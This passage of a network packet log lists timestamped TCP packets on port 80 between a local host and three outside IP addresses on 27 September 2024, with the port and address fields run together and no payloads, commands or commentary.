                                                                          Sep 27, 2024 04:21:15.656300068 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.656778097 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.656790972 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.656800985 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.656841993 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.656867027 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.656934977 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.656944990 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.656955004 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.656964064 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.656974077 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.656984091 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.656994104 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.656994104 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.657061100 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.661446095 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.661524057 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.661556959 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.661566019 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.661575079 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.661585093 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.661595106 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.661604881 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.661612988 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.661634922 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.661639929 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.661648035 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.661663055 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.661705017 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.661711931 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.661715031 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.661731005 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.661752939 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.661760092 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.661771059 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.661772013 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.661782026 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.661791086 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.661811113 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.661839962 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.662410021 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662419081 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662431002 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662465096 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662468910 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.662475109 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662486076 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662491083 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.662497997 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662508965 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662523031 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.662553072 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.662657976 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662667990 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662678957 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662707090 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.662736893 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.662744999 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662755013 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662765026 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662775040 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662802935 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.662828922 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.662832022 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662842989 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662862062 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662870884 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662882090 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662883043 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.662897110 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662906885 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.662908077 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.662939072 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.662971020 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.662993908 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.663003922 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.663012981 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.663022995 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.663033962 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.663048029 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.663078070 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.663199902 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.663211107 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.663219929 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.663228989 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.663239002 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.663249016 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.663258076 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.663259983 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.663271904 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.663285017 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.663285017 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.663316965 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.674794912 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.674854040 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.674865961 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.674879074 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.674896002 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.674909115 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.674921036 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.674923897 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.674936056 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.674940109 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.674962997 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.674988985 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.675035000 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.675046921 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.675056934 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.675065994 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.675076962 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.675090075 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.675113916 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.675175905 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.675192118 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.675201893 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.675211906 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.675221920 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.675229073 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.675231934 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.675242901 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.675254107 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.675259113 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.675272942 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.675290108 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.675339937 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.675339937 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.678698063 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.678710938 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.678720951 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.678759098 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.678769112 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.678781033 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.678787947 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.678801060 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.678811073 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.678817987 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.678829908 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.678879023 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.678879023 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.678884983 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.678895950 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.678905964 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.678945065 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.678945065 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.678971052 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.678985119 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.678994894 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.679006100 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.679013014 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.679060936 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.700592995 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.700654984 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.700794935 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.700804949 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.700814962 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.700824022 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.700834990 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.700845957 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.700855017 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.700886965 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.701044083 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.701055050 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.701064110 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.701073885 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.701083899 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.701093912 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.701106071 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.701109886 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.701112986 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.701119900 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.701154947 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.704823971 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.704854965 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.704865932 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.704884052 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.704890013 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.704927921 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.704927921 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.710639000 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.710674047 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.710686922 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.710692883 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.710726023 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.710728884 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.710746050 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.710757017 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.710768938 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.710768938 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.710803986 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.710823059 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.733057976 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.733093023 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.733103991 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.733128071 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.733140945 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.733146906 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.733151913 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.733190060 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.733194113 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.733208895 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.733238935 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.733238935 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.733270884 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.742940903 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:15.742957115 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:15.742969036 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743021965 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:15.743021965 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:15.743069887 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743081093 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743091106 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743115902 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743129015 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743140936 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:15.743140936 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:15.743148088 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743160009 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743176937 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743176937 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.743190050 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743201017 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.743208885 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.743211985 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743231058 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743244886 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743256092 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743257046 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.743273020 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.743310928 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.743310928 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.743319988 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743333101 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743343115 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743354082 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743372917 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.743372917 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.743415117 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743422985 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.743436098 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743447065 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.743464947 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.743464947 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.743486881 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.744329929 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.744405031 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.752038956 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.752058029 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.752070904 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.752099037 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.752099037 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.752106905 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.752119064 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.752131939 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.752142906 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.752170086 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.752193928 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.752310038 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.752320051 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.752367973 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.752386093 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.752408981 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.752419949 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.752444983 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.752475977 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.752491951 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.752502918 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.752513885 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.752518892 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.752537966 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.752568960 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.752568960 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.752631903 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753031015 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753082991 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753097057 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753108025 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753125906 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753138065 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753156900 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753180981 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753180981 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753192902 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753205061 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753216028 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753226042 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753243923 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753267050 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753305912 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753315926 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753315926 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753319025 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753331900 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753340960 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753343105 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753372908 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753391981 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753391981 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753403902 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753415108 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753424883 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753460884 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753460884 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753490925 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753499985 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753510952 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753521919 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753561020 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753582954 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753596067 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753607035 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753618002 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753649950 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753654957 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753662109 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753676891 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753705978 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753746033 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753757954 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753767967 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753786087 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753802061 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753813028 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753815889 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753815889 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.753849030 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.753849983 CEST4972480192.168.2.5176.113.115.95
